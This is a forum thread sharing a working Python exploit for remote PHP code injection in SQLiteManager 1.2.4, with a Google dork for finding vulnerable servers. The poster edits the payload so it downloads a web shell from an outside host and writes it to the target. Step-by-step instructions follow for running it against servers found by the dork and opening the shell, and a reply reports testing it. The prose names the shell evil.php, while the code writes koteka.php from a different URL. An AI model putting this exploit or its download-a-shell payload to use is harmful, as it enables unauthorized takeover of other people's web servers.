[Share] SQLiteManager 0Day Remote PHP Code Injection Vulnerability
#1
Haven't posted in a long time, just want to share the SQLiteManager 0-day; the version proven to work is 1.2.4.
Exploit link: SQlitemanager.

Here's what the script looks like:
Code:
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:

Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/

Name: Ampps
Official Site: http://www.ampps.com/

Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================

import re
import urllib2
from urllib import urlencode
from sys import argv, exit

def strip_tags(value):
   #Strip tags with RegEx
   return re.sub('<[^>]*?>', '', value)

def getDbId(sqliteUrl, myDbName):
   #Find Components
   htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
   if htmlRes:
       #If you found it take all the rows
       td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
       #Make a dict of stripped columns
       for element in td:
           if strip_tags(element) == myDbName:
               #Return Id
               return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
   return None

def main():
   print \
       'SQLiteManager Exploit\n' + \
       'Made By RealGame\n' + \
       'http://www.RealGame.co.il\n'
   
   if len(argv) < 2:
       #replace('\\', '/') - To Do The Same In Win And Linux
       filename = argv[0].replace('\\', '/').split('/')[-1]
       
       print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
       exit()
   
   sqliteUrl = argv[1]    
   myDbName  = "phpinfo"
   myDbFile  = "phpinfo.php"
   #Create Database
   params = {'dbname'      : myDbName,
             'dbVersion'   : '2',
             'dbRealpath'  : None,
             'dbpath'      : myDbFile,
             'action'      : 'saveDb'}
   urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
   #Get Database ID
   dbId = getDbId(sqliteUrl + "left.php", myDbName)
   #If Database Created
   if dbId:
       #Create Table + Shell Creator
       params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                     'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                 'sqlFile'         : None,
                 'action'          : 'sql',
                 'sqltype'         : '1'}
       urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
       #Inject Code
       urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
       #Remove Database
       urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
       
       print 'Succeed'
       return
       
   print 'Failed'

if __name__ == '__main__':
   main()


The script above still errors when run, because several lines that aren't code get executed by Python. After a small edit it becomes:


Code:
"""
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
"""

import re
import urllib2
from urllib import urlencode
from sys import argv, exit
 
def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)
 
def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td: 
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None
 
def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
     
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]
         
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
     
    sqliteUrl = argv[1]     
    myDbName  = "xxx"
    myDbFile  = "xxx.php"
    #Create Database
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php $destination=fopen("koteka.php","w");$source=fopen("http://bejina.fr/inc.txt","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);  ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
        #Inject Code
        urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
        #Remove Database
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
         
        print 'Succeed'
        return
         
    print 'Failed'
 
if __name__ == '__main__':
    main()

The description section is put in a comment so it isn't executed, and the params variable, which previously held a command to display phpinfo(), is changed to read a file from http://www.r57shell.net/c99.txt and write it back out to a file named evil.php.

Step by step:
1. Find a target that matches the dork above
2. Run the script from the command line:
Code:
nasa:exploit nasa$ python nama_script.py http://target/sqlite/
SQLiteManager Exploit
Made By RealGame
http://www.RealGame.co.il

Succeed
nasa:exploit nasa$

If it says Succeed, open the link:
http://target/sqlite/xxx.php so the backdoor gets written, then open the link http://target/sqlite/evil.php to run the shell

3. Once you've got a shell, don't forget to patch it so nobody else can exploit it again .. :D

Thank you..
Hacking isn't just Computers & Exploits. It's a Philosophy.

#2
Whoa, tested, with a small change to the parameters that bro nasa gave.

nice share, bro nasa
